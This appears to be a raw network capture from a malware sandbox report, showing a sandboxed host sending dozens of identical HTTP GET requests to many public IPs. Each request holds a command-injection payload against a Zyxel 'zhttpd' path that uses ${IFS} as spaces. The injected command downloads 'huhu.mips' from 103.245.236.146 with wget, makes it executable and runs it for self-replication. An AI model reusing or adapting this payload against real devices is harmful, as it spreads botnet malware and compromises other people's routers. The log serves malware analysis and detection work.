                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633282900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7899192.168.2.235322844.227.131.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633335114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7900192.168.2.234263049.195.118.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633382082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7901192.168.2.2338308164.23.48.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633424997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7902192.168.2.2348146203.68.211.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633467913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7903192.168.2.2346144117.202.239.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633506060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7904192.168.2.2336518144.27.77.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633536100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7905192.168.2.2355212124.200.177.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633603096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7906192.168.2.2357248133.4.150.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633635044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7907192.168.2.2358626112.176.6.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633692026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7908192.168.2.2350994211.250.231.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633717060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7909192.168.2.2354032216.36.200.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633769989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7910192.168.2.2357078134.225.50.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633802891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7911192.168.2.2336972111.155.10.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633835077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7912192.168.2.2334292160.124.234.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633903980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7913192.168.2.2342566198.212.214.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633925915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7914192.168.2.235677877.242.70.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.633969069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7915192.168.2.2340780216.70.198.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634042025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7916192.168.2.235065250.126.89.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634078979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7917192.168.2.2340984202.200.129.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634120941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7918192.168.2.2349748162.245.147.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634179115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7919192.168.2.234114037.235.124.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634217978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7920192.168.2.2350640162.132.194.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634253979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7921192.168.2.2342862169.195.4.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634301901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7922192.168.2.2345066199.212.242.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634383917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7923192.168.2.2360912201.74.26.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634406090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7924192.168.2.2343804202.171.52.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634442091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7925192.168.2.235491014.44.195.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634469986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7926192.168.2.235611887.99.53.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634529114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7927192.168.2.235413639.199.186.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634561062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7928192.168.2.2353372192.121.201.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634613037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7929192.168.2.2354220146.150.134.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634659052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7930192.168.2.235649077.77.5.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634717941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7931192.168.2.2334468125.247.167.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634731054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7932192.168.2.234749618.151.64.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634780884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7933192.168.2.233695897.133.84.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634850979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7934192.168.2.235157035.207.153.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634891033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7935192.168.2.2348480131.41.16.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634926081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7936192.168.2.2343782147.13.53.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.634962082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7937192.168.2.2352022210.71.11.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635020018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7938192.168.2.2338462152.82.219.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635075092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7939192.168.2.235771481.207.240.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635082960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7940192.168.2.233383059.201.199.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635111094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7941192.168.2.2346176116.200.102.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635149002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7942192.168.2.234085669.129.195.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635194063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7943192.168.2.234669098.220.215.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635219097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7944192.168.2.234531863.31.36.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635258913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7945192.168.2.234235663.30.155.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635303020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7946192.168.2.233633417.214.99.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635339022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7947192.168.2.2335422180.174.226.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635389090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7948192.168.2.2349278131.248.2.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635441065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7949192.168.2.2352252146.106.146.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635493040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7950192.168.2.233497666.40.218.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635512114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7951192.168.2.2333104182.145.27.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635564089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7952192.168.2.2340838141.37.242.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635617971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7953192.168.2.2355274112.186.173.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635653973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7954192.168.2.233734649.73.209.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635679960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7955192.168.2.23440049.222.38.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635736942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7956192.168.2.2349686207.41.200.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635795116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7957192.168.2.2348232107.20.181.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635848045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7958192.168.2.233739842.8.187.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635905981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7959192.168.2.235624643.125.144.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635937929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7960192.168.2.234648634.198.78.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.635978937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7961192.168.2.2336840207.99.206.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.636032104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7962192.168.2.234294045.47.207.235443
                                                TimestampBytes transferredDirectionData
